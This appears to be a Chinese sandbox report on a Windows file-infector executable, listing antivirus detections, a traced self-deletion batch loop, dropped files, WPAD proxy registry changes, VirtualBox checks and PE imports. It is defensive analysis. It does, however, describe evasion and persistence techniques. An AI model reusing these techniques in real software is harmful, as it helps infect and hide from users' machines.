7.4
高危
63 个模型检测该样本为恶意!
重新分析
更多

768ce82fc08a1e6da63bdf72dea66916992856b85bdf1eed47fb3a1a8609cd9d

17ac17b700ad398d8db0dd61b11aff61.exe

分析耗时

80s

最近分析

文件大小

1.7MB
静态报毒 动态报毒 AI SCORE=87 ALI2000007 BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR HIGH HIGH CONFIDENCE INFECTPE JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PATE PCARRIER RAMNIT ROUE SCORE SMALL UNSAFE VJADTRE WALI WAPOMI 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba virus:Win32/InfectPE.ali2000007 20190527 0.3.0.5
Baidu Win32.Virus.Otwycal.d 20190318 1.0.0.2
Tencent Virus.Win32.Loader.aab 20200422 1.0.0.1
Kingsoft 20200422 2013.8.14.323
McAfee W32/Kudj 20200422 6.0.6.653
Avast Win32:Malware-gen 20200422 18.4.3895.0
CrowdStrike win/malicious_confidence_90% (W) 20190702 1.0
静态指标
Command line console output was observed (50 out of 542 个事件)
Time & API Arguments Status Return Repeated
1620137873.707
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137873.707
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1620137873.707
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137873.878
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe
console_handle: 0x00000007
success 1 0
1620137873.941
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1620137873.972
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137873.972
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1620137873.972
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137873.972
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1620137873.988
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1620137874.003
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.003
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1620137874.003
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.066
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe
console_handle: 0x00000007
success 1 0
1620137874.066
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1620137874.082
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.082
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1620137874.082
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.082
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1620137874.082
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1620137874.097
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.097
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1620137874.097
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.128
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe
console_handle: 0x00000007
success 1 0
1620137874.128
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1620137874.16
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.175
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1620137874.175
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.175
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1620137874.191
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1620137874.253
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.269
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1620137874.269
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.363
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe
console_handle: 0x00000007
success 1 0
1620137874.363
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1620137874.394
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.41
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1620137874.41
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.41
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1620137874.425
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1620137874.425
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.425
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1620137874.425
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.457
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe
console_handle: 0x00000007
success 1 0
1620137874.457
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1620137874.488
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1620137874.488
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1620137874.488
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\hsguUaA.exe"
console_handle: 0x00000007
success 1 0
1620137874.488
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1620137874.519
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
This executable has a PDB path (1 个事件)
pdb_path C:\Users\fuqikang\Documents\Visual Studio 2008\Projects\ResetPCDNClient\Release\百金助手.pdb
Tries to locate where the browsers are installed (1 个事件)
file C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section bNa\xf8\xa3uc
行为判定
动态指标
Foreign language identified in PE resource (50 out of 69 个事件)
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_CURSOR language LANG_CHINESE offset 0x00182f94 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000134
name RT_BITMAP language LANG_CHINESE offset 0x00183180 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_BITMAP language LANG_CHINESE offset 0x00183180 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000144
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_ICON language LANG_CHINESE offset 0x00193bd8 filetype dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 32888 sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x000002e8
name RT_DIALOG language LANG_CHINESE offset 0x0019439c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000034
name RT_DIALOG language LANG_CHINESE offset 0x0019439c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000034
name RT_DIALOG language LANG_CHINESE offset 0x0019439c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000034
name RT_DIALOG language LANG_CHINESE offset 0x0019439c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000034
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
name RT_STRING language LANG_CHINESE offset 0x00194d68 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000030
Creates executable files on the filesystem (20 个事件)
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\618f1f16.bat
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5D140FD5.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\0FB16CC6.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\70071042.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\4BCB6AA0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3FAC0968.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\hsguUaA.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
Drops a binary and executes it (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\618f1f16.bat
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\hsguUaA.exe
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1620137873.065625
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\618f1f16.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\618f1f16.bat
show_type: 0
success 1 0
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (2 个事件)
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1620137865.565625
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 6.9348295736948 section {'size_of_data': '0x00004200', 'virtual_address': '0x001b9000', 'entropy': 6.9348295736948, 'name': 'bNa\\xf8\\xa3uc', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1620119622.923198
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1620137868.127625
RegSetValueExA
key_handle: 0x00000394
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620137868.127625
RegSetValueExA
key_handle: 0x00000394
value: ŽŸ³Ü@×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620137868.127625
RegSetValueExA
key_handle: 0x00000394
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620137868.127625
RegSetValueExW
key_handle: 0x00000394
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620137868.127625
RegSetValueExA
key_handle: 0x000003fc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620137868.127625
RegSetValueExA
key_handle: 0x000003fc
value: ŽŸ³Ü@×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620137868.127625
RegSetValueExA
key_handle: 0x000003fc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1620137868.159625
RegSetValueExW
key_handle: 0x00000398
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1620137868.893625
RegSetValueExA
key_handle: 0x00000410
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1620137868.893625
RegSetValueExA
key_handle: 0x00000410
value: ÐH´Ü@×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1620137868.893625
RegSetValueExA
key_handle: 0x00000410
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1620137868.893625
RegSetValueExW
key_handle: 0x00000410
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1620137868.893625
RegSetValueExA
key_handle: 0x00000414
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1620137868.893625
RegSetValueExA
key_handle: 0x00000414
value: ÐH´Ü@×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1620137868.893625
RegSetValueExA
key_handle: 0x00000414
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a file (5 个事件)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 63 AntiVirus engines on VirusTotal as malicious (50 out of 63 个事件)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.17ac17b700ad398d
ALYac Win32.VJadtre.3
Cylance Unsafe
Zillya Virus.Nimnul.Win32.5
K7AntiVirus Virus ( 0040f7441 )
Alibaba virus:Win32/InfectPE.ali2000007
K7GW Virus ( 0040f7441 )
Cybereason malicious.700ad3
Arcabit Win32.VJadtre.3
TrendMicro PE_WAPOMI.BM
Baidu Win32.Virus.Otwycal.d
F-Prot W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Paloalto generic.ml
ClamAV Win.Trojan.Downloader-64720
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
AegisLab Virus.Win32.Nimnul.m1R5
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
Sophos W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
VIPRE Virus.Win32.Small.acea (v)
McAfee-GW-Edition BehavesLike.Win32.Pate.th
Trapmine malicious.high.ml.score
Emsisoft Win32.VJadtre.3 (B)
SentinelOne DFI - Malicious PE
Cyren W32/PatchLoad.E
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
MAX malware (ai score=87)
Antiy-AVL Virus/Win32.Nimnul.f
Microsoft Virus:Win32/Mikcer.B
Endgame malicious (high confidence)
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
AhnLab-V3 Win32/VJadtre.Gen
Acronis suspicious
McAfee W32/Kudj
TACHYON Virus/W32.Ramnit.C
VBA32 Virus.Nimnul.19209
Malwarebytes Virus.Agent
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2018-06-27 10:37:37

Imports

Library PSAPI.DLL:
Library KERNEL32.dll:
0x52e1e8 GetLocaleInfoA
0x52e1ec WriteConsoleA
0x52e1f0 GetConsoleOutputCP
0x52e1f4 WriteConsoleW
0x52e1f8 GetProcessHeap
0x52e208 SizeofResource
0x52e20c LockResource
0x52e210 LoadResource
0x52e214 FindResourceW
0x52e218 GetCurrentProcess
0x52e21c GetLastError
0x52e220 CloseHandle
0x52e224 OpenProcess
0x52e228 GetProcessTimes
0x52e22c TerminateProcess
0x52e234 Process32FirstW
0x52e238 Process32NextW
0x52e23c CreateProcessW
0x52e240 GetStringTypeA
0x52e244 GetProcAddress
0x52e248 GetModuleHandleW
0x52e24c FreeLibrary
0x52e250 GlobalAlloc
0x52e254 lstrcmpW
0x52e258 GlobalLock
0x52e25c InterlockedExchange
0x52e260 WideCharToMultiByte
0x52e264 MultiByteToWideChar
0x52e268 CompareStringA
0x52e26c LoadLibraryW
0x52e270 GetLocaleInfoW
0x52e274 lstrcmpA
0x52e278 GetModuleFileNameW
0x52e280 GetCurrentThreadId
0x52e284 GetCurrentThread
0x52e288 GlobalDeleteAtom
0x52e28c GlobalFree
0x52e290 FreeResource
0x52e29c lstrlenW
0x52e2a0 CreateProcessA
0x52e2a4 GetExitCodeProcess
0x52e2a8 CreateFileA
0x52e2ac GetConsoleMode
0x52e2b0 GetConsoleCP
0x52e2b4 LCMapStringA
0x52e2bc LCMapStringW
0x52e2c0 IsValidCodePage
0x52e2c4 GetOEMCP
0x52e2c8 GetACP
0x52e2cc GetCPInfo
0x52e2d0 GetFileAttributesA
0x52e2d8 IsDebuggerPresent
0x52e2e4 VirtualFree
0x52e2e8 HeapCreate
0x52e2ec GetStartupInfoA
0x52e2f0 SetHandleCount
0x52e2f4 GetCommandLineW
0x52e300 GetModuleFileNameA
0x52e304 GetStdHandle
0x52e30c GlobalUnlock
0x52e314 GetStringTypeW
0x52e318 GetFileType
0x52e31c SetStdHandle
0x52e320 SetThreadPriority
0x52e324 ResumeThread
0x52e328 WaitForSingleObject
0x52e32c VirtualQuery
0x52e330 GetSystemInfo
0x52e334 VirtualAlloc
0x52e338 HeapSize
0x52e33c HeapReAlloc
0x52e340 RaiseException
0x52e344 CreateThread
0x52e348 ExitThread
0x52e34c ExitProcess
0x52e350 RtlUnwind
0x52e354 HeapFree
0x52e358 HeapAlloc
0x52e360 GetStartupInfoW
0x52e364 FindResourceExW
0x52e368 VirtualProtect
0x52e36c GetFileTime
0x52e370 GetFileSizeEx
0x52e378 Sleep
0x52e37c GetProfileIntW
0x52e380 GetTickCount
0x52e384 SearchPathW
0x52e388 GetTempPathW
0x52e38c GetTempFileNameW
0x52e390 SetErrorMode
0x52e398 GlobalGetAtomNameW
0x52e39c GetFullPathNameW
0x52e3a4 FindFirstFileW
0x52e3a8 FindClose
0x52e3ac DuplicateHandle
0x52e3b0 SetEndOfFile
0x52e3b4 UnlockFile
0x52e3b8 LockFile
0x52e3bc FlushFileBuffers
0x52e3c0 SetFilePointer
0x52e3c4 WriteFile
0x52e3c8 ReadFile
0x52e3cc GetThreadLocale
0x52e3d0 lstrlenA
0x52e3d4 CreateFileW
0x52e3d8 GetFileSize
0x52e3dc GetFileAttributesW
0x52e3e0 lstrcpyW
0x52e3e8 TlsFree
0x52e3f0 LocalReAlloc
0x52e3f4 TlsSetValue
0x52e3f8 TlsAlloc
0x52e400 GlobalHandle
0x52e404 GlobalReAlloc
0x52e40c TlsGetValue
0x52e414 LocalAlloc
0x52e418 GlobalFlags
0x52e420 GetModuleHandleA
0x52e424 CopyFileW
0x52e428 GlobalSize
0x52e42c FormatMessageW
0x52e430 LocalFree
0x52e434 MulDiv
0x52e43c GlobalFindAtomW
0x52e440 GetVersionExW
0x52e444 CompareStringW
0x52e448 LoadLibraryA
0x52e44c GetVersionExA
0x52e450 GetCurrentProcessId
0x52e454 SetLastError
0x52e458 GlobalAddAtomW
Library USER32.dll:
0x52e4ec MapVirtualKeyExW
0x52e4f0 GetKeyNameTextW
0x52e4f4 IsCharLowerW
